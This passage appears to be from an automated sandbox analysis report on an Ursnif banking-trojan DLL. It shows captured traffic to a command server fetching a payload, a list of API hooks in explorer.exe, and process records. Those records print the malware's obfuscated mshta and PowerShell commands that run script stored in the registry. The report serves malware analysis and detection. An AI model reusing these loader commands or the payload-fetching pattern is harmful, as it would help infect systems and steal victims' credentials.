91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:40 UTC1803INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:40 UTC1819INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:40 UTC1835INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:40 UTC1851INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:40 UTC1867INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:40 UTC1884INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            8 | 192.168.2.6 | 49821 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:40 UTC | 1883 | OUT | GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC | 1890 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=3g53sj8d899903i6i2mpe7v7i2; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:40 UTC | 1891 | IN | Data Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                            Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            9 | 192.168.2.6 | 49822 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-14 09:21:40 UTC | 1892 | OUT | GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC | 1893 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=1i518ljo1cass7agikmih55pd4; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:40 UTC | 1893 | IN | Data Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                            Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                            Code Manipulations

                            User Modules

                            Hook Summary

                            Function Name | Hook Type | Active in Processes
                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe
                            CreateProcessAsUserW | EAT | explorer.exe
                            CreateProcessAsUserW | INLINE | explorer.exe
                            CreateProcessW | EAT | explorer.exe
                            CreateProcessW | INLINE | explorer.exe
                            CreateProcessA | EAT | explorer.exe
                            CreateProcessA | INLINE | explorer.exe

                            Processes

                            Process: explorer.exe, Module: user32.dll
                            Function Name | Hook Type | New Data
                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFD88935200
                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 4E12000

                            Process: explorer.exe, Module: WININET.dll
                            Function Name | Hook Type | New Data
                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFD88935200
                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 4E12000

                            Process: explorer.exe, Module: KERNEL32.DLL
                            Function Name | Hook Type | New Data
                            CreateProcessAsUserW | EAT | 7FFD8893521C
                            CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                            CreateProcessW | EAT | 7FFD88935200
                            CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                            CreateProcessA | EAT | 7FFD8893520E
                            CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00

                            Statistics

                            CPU Usage

                            Memory Usage

                            High Level Behavior Distribution

                            Behavior

                            System Behavior

                            General

                            Start time:10:20:20
                            Start date:14/12/2021
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll"
                            Imagebase:0x2d0000
                            File size:116736 bytes
                            MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:moderate

                            General

                            Start time:10:20:20
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
                            Imagebase:0x2a0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:10:20:21
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\regsvr32.exe
                            Wow64 process (32bit):true
                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
                            Imagebase:0x940000
                            File size:20992 bytes
                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Start time:10:20:21
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
                            Imagebase:0xad0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Start time:10:20:21
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
                            Imagebase:0xad0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            General

                            Start time:10:21:44
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:10:21:44
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:10:21:44
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:10:21:45
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:10:21:46
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

